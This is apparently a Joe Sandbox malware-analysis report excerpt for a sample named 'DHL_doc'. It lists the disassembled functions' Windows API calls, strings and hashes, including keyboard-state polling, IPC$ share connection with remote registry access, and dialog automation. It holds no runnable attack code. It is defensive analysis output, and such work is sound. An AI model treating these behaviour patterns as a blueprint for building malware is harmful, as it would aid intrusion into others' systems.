Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: f1cee007af8c95daf1b87077b7ab3386aa076a9b4edd393c6a65828b3c6721e6
Instruction ID: 0f05d4fc46e881cae8d56da5f47e5b4b49d04654d80c4314da135674944bb188
Opcode Fuzzy Hash: f1cee007af8c95daf1b87077b7ab3386aa076a9b4edd393c6a65828b3c6721e6
Instruction Fuzzy Hash: 6C316B71D02229BBDB209B51DC88EEFBF7CEF05751F000165AA16E2250DA349A45EAE0

Function 00F33D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F33D40
_wcslen.LIBCMT ref: 00F33D6D
CreateDirectoryW.KERNEL32(?,00000000), ref: 00F33D9D
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F33DBE
RemoveDirectoryW.KERNEL32(?), ref: 00F33DCE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F33E55
CloseHandle.KERNEL32(00000000), ref: 00F33E60
CloseHandle.KERNEL32(00000000), ref: 00F33E6B

Strings

:, xrefs: 00F33D82
\??\%s, xrefs: 00F33D5B
\, xrefs: 00F33D77

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 9dcb918af4a0152061b4a475d5a9e6ffc9bfee106cded63d0a6b3f0b8b410608
Instruction ID: ae20f880e05c9c2b4228cd8f6851e6c1d6c49d85e3b3a01b9db7be9f26fe4a0c
Opcode Fuzzy Hash: 9dcb918af4a0152061b4a475d5a9e6ffc9bfee106cded63d0a6b3f0b8b410608
Instruction Fuzzy Hash: A031837290025DABDB21DBA0DC49FEB37BCEF88711F1041A5F605E6160E77497849B64

Function 00F2E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00F2E6B4

Part of subcall function 00EDE551: timeGetTime.WINMM(?,?,00F2E6D4), ref: 00EDE555

Sleep.KERNEL32(0000000A), ref: 00F2E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00F2E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00F2E727
SetActiveWindow.USER32 ref: 00F2E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F2E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 00F2E773
Sleep.KERNEL32(000000FA), ref: 00F2E77E
IsWindow.USER32 ref: 00F2E78A
EndDialog.USER32(00000000), ref: 00F2E79B

Strings

BUTTON, xrefs: 00F2E719

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 31973de2dcaf9df866807d1d5afc2542bd7bb174cda469a8b65999d2a02d456c
Instruction ID: e49a5794e25ad54d4b5b9faebf6d39db1bcc2bac50cc37c9c93b4c31fa71f55c
Opcode Fuzzy Hash: 31973de2dcaf9df866807d1d5afc2542bd7bb174cda469a8b65999d2a02d456c
Instruction Fuzzy Hash: 9821C3B020431DBFEB105F60FC89E253B69F75575AF200426F617826A2DB75AC00BB64

Function 00F2E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00EC9CB3: _wcslen.LIBCMT ref: 00EC9CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F2EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F2EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F2EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F2EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F2EAA7

Strings

play PlayMe wait, xrefs: 00F2EA91
status PlayMe mode, xrefs: 00F2EA58
close PlayMe, xrefs: 00F2EA6E, 00F2EA9B
open , xrefs: 00F2EA0C
alias PlayMe, xrefs: 00F2EA36
play PlayMe, xrefs: 00F2EAA2

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 2ff3be7469a837f915f21314907cbe363ece0a5b388d2636ad72bedcfc52612e
Instruction ID: bf8d73d23cef0dc4975110f67acee19c4ab6e986d761dc684793c1643a501759
Opcode Fuzzy Hash: 2ff3be7469a837f915f21314907cbe363ece0a5b388d2636ad72bedcfc52612e
Instruction Fuzzy Hash: 0211A331B5026979D720B7A1ED4AEFF6ABCEBD1B10F100429B411E20D1EE704906DAB1

Function 00F25CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00F25CE2
GetWindowRect.USER32(00000000,?), ref: 00F25CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00F25D59
GetDlgItem.USER32(?,00000002), ref: 00F25D69
GetWindowRect.USER32(00000000,?), ref: 00F25D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00F25DCF
GetDlgItem.USER32(?,000003E9), ref: 00F25DDD
GetWindowRect.USER32(00000000,?), ref: 00F25DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00F25E31
GetDlgItem.USER32(?,000003EA), ref: 00F25E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F25E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 00F25E67

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 30202f862763775b1ce9e72f81adf54aec043b3829d33bc3f0da0aa5d678d52e
Instruction ID: 0e7e8b0fb4b8a00bfb526843438b34088f5419c6dbbf19ba4d4b15418a9591b0
Opcode Fuzzy Hash: 30202f862763775b1ce9e72f81adf54aec043b3829d33bc3f0da0aa5d678d52e
Instruction Fuzzy Hash: 83511D71E00719AFDF18CF68DD89AAEBBB5EB48711F508129F516E7290D7709E00DB50

Function 00ED8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00ED8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00ED8BE8,?,00000000,?,?,?,?,00ED8BBA,00000000,?), ref: 00ED8FC5

DestroyWindow.USER32(?), ref: 00ED8C81
KillTimer.USER32(00000000,?,?,?,?,00ED8BBA,00000000,?), ref: 00ED8D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00F16973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00ED8BBA,00000000,?), ref: 00F169A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00ED8BBA,00000000,?), ref: 00F169B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00ED8BBA,00000000), ref: 00F169D4
DeleteObject.GDI32(00000000), ref: 00F169E6

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 0ff0d5dbdc353eeab871b7a1b35e5594b227d613085fa489564f2a23669c8ce5
Instruction ID: f70cb1daa6010fd24483d9ca8887abcc5c42a3ce22edb721eaa69515dfa98adf
Opcode Fuzzy Hash: 0ff0d5dbdc353eeab871b7a1b35e5594b227d613085fa489564f2a23669c8ce5
Instruction Fuzzy Hash: 0861BF30511709DFDB359F14DA48B69B7F1FF40326F14552AE042A66A0CB35ACC2EF91

Function 00ED9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00ED9944: GetWindowLongW.USER32(?,000000EB), ref: 00ED9952

GetSysColor.USER32(0000000F), ref: 00ED9862

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 3dea19cafd4b59b59513ff703620a9da02d064fb53d834777ea2873fcb1c98ee
Instruction ID: 53ca3bbdba15cb09b3e8dadc6f2017d2251c62ab00e38658cdcfd933886637d5
Opcode Fuzzy Hash: 3dea19cafd4b59b59513ff703620a9da02d064fb53d834777ea2873fcb1c98ee
Instruction Fuzzy Hash: 0F41F5355047049FDB245F389C84BB937A5EB06731F185606FAA6972E2C7319C43FB50

Function 00EF8D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Strings

., xrefs: 00EF903A, 00EF8FD0, 00EF8FF2

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-3963672497
Opcode ID: bd60ea5abfd54c72babe4890365be6f13604965dae302d7c002a60f8a564a3f3
Instruction ID: 1c153bca2385c8c6dd6b0b80e742894e351a15edb218536bc8b709bd64d6441b
Opcode Fuzzy Hash: bd60ea5abfd54c72babe4890365be6f13604965dae302d7c002a60f8a564a3f3
Instruction Fuzzy Hash: 2AC1E075A0424DAFCB11DFA8D841BBDBBF0AF49314F086199EA55B73A2CB318941CB61

Function 00F296E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00F0F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00F29717
LoadStringW.USER32(00000000,?,00F0F7F8,00000001), ref: 00F29720

Part of subcall function 00EC9CB3: _wcslen.LIBCMT ref: 00EC9CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00F0F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00F29742
LoadStringW.USER32(00000000,?,00F0F7F8,00000001), ref: 00F29745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00F29866

Strings

^ ERROR, xrefs: 00F297FB
Line %d:, xrefs: 00F297A0
Line %d (File "%s"):, xrefs: 00F2978F
%s (%d) : ==> %s: %s %s, xrefs: 00F2984A
Error: , xrefs: 00F2981D

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 053f7f99749f0aad4537edde4809f795fd2beac5e6a0e84ebd492d777942143a
Instruction ID: 10068133b0e84b5e2786a3fd4f0a41e309bc01861b598739792fa3e4cd7affbe
Opcode Fuzzy Hash: 053f7f99749f0aad4537edde4809f795fd2beac5e6a0e84ebd492d777942143a
Instruction Fuzzy Hash: BA416172904219AACF04FBE0DE46EEE73B8AF54300F501029F60673092EB765F49DB61

Function 00F206DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC6B57: _wcslen.LIBCMT ref: 00EC6B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00F207A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00F207BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00F207DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00F20804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00F2082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F20837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F2083C

Strings

\IPC$, xrefs: 00F20784
SOFTWARE\Classes\, xrefs: 00F2070E
\CLSID, xrefs: 00F20724

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 4ee5c92cc1a66c5c242807a99d590092cf793c951eeef17be08db825237efe2e
Instruction ID: ea8d82556d89c9fa0a3e3386b1ab839b5d44314fbc8e17d42a99e13071136ddc
Opcode Fuzzy Hash: 4ee5c92cc1a66c5c242807a99d590092cf793c951eeef17be08db825237efe2e
Instruction Fuzzy Hash: AD411872D1022DABCF15EBA4EC85DEEB7B8FF04754B044129E901B31A1EB319E05DB90

Function 00F43C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00F43C5C
CoInitialize.OLE32(00000000), ref: 00F43C8A
CoUninitialize.OLE32 ref: 00F43C94
_wcslen.LIBCMT ref: 00F43D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00F43DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00F43ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00F43F0E
CoGetObject.OLE32(?,00000000,00F5FB98,?), ref: 00F43F2D
SetErrorMode.KERNEL32(00000000), ref: 00F43F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F43FC4
VariantClear.OLEAUT32(?), ref: 00F43FD8

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 9c212d3f04252dd3695485a8c5d2db41289053211ad1cd16ddb5d2d7a39e2a02
Instruction ID: 6727495f67096851644edb5cca023efc78b1a5a272fb14941ac7dc7d9064177c
Opcode Fuzzy Hash: 9c212d3f04252dd3695485a8c5d2db41289053211ad1cd16ddb5d2d7a39e2a02
Instruction Fuzzy Hash: 1DC14771A083059FD700DF68C88492BBBE9FF89754F10491DF98A9B251D731EE0ADB92

Function 00F37A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00F37AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F37B8F
SHGetDesktopFolder.SHELL32(?), ref: 00F37BA3
CoCreateInstance.OLE32(00F5FD08,00000000,00000001,00F86E6C,?), ref: 00F37BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F37C74
CoTaskMemFree.OLE32(?,?), ref: 00F37CCC
SHBrowseForFolderW.SHELL32(?), ref: 00F37D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F37D7A
CoTaskMemFree.OLE32(00000000), ref: 00F37D81
CoTaskMemFree.OLE32(00000000), ref: 00F37DD6
CoUninitialize.OLE32 ref: 00F37DDC

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 902a7496139a6f3a6c8f255c1591f82f5b73f564ff4f81690ddbec46863d8827
Instruction ID: ce399797d46cfbd38311e2281e722c906ff9bc1cec21b349e332fd1cbd0e0369
Opcode Fuzzy Hash: 902a7496139a6f3a6c8f255c1591f82f5b73f564ff4f81690ddbec46863d8827
Instruction Fuzzy Hash: 61C13B75A04209AFCB14DF64C884DAEBBF9FF48314F148499E916AB361D731ED42DB90

Function 00F5541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F55504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F55515
CharNextW.USER32(00000158), ref: 00F55544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F55585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F5559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F555AC

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 36b80a2a59de6c29c862fa62c481e16ee326c00e5032b292c91cae65664720de
Instruction ID: 56841d27a6171af5638ce170c987e336222ba269518da9b03979710f6cfc3d41
Opcode Fuzzy Hash: 36b80a2a59de6c29c862fa62c481e16ee326c00e5032b292c91cae65664720de
Instruction Fuzzy Hash: B4617131900609EFDF10DF54CCA4AFE7B79FB06B26F144145FB15A6290D7748A49EB60

Function 00F1FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00F1FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 00F1FB08
VariantInit.OLEAUT32(?), ref: 00F1FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00F1FB3A
VariantCopy.OLEAUT32(?,?), ref: 00F1FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00F1FBA1
VariantClear.OLEAUT32(?), ref: 00F1FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 00F1FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F1FBCC
VariantClear.OLEAUT32(?), ref: 00F1FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F1FBE9

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 287279d69a872586adee25b894182c1a9a2e285d5a8d73c6bf8284bd00eb6ace
Instruction ID: 680e21905682dbd88e6e6fc84297daa42e2834d7fa4490a83c9c77d14ab6e540
Opcode Fuzzy Hash: 287279d69a872586adee25b894182c1a9a2e285d5a8d73c6bf8284bd00eb6ace
Instruction Fuzzy Hash: D5414E75A00319DFCB00DF64CC54DEEBBB9FF48355F048069E956A7261CB34A986EBA0

Function 00F29C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00F29CA1
GetAsyncKeyState.USER32(000000A0), ref: 00F29D22
GetKeyState.USER32(000000A0), ref: 00F29D3D
GetAsyncKeyState.USER32(000000A1), ref: 00F29D57
GetKeyState.USER32(000000A1), ref: 00F29D6C
GetAsyncKeyState.USER32(00000011), ref: 00F29D84
GetKeyState.USER32(00000011), ref: 00F29D96
GetAsyncKeyState.USER32(00000012), ref: 00F29DAE
GetKeyState.USER32(00000012), ref: 00F29DC0
GetAsyncKeyState.USER32(0000005B), ref: 00F29DD8
GetKeyState.USER32(0000005B), ref: 00F29DEA

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
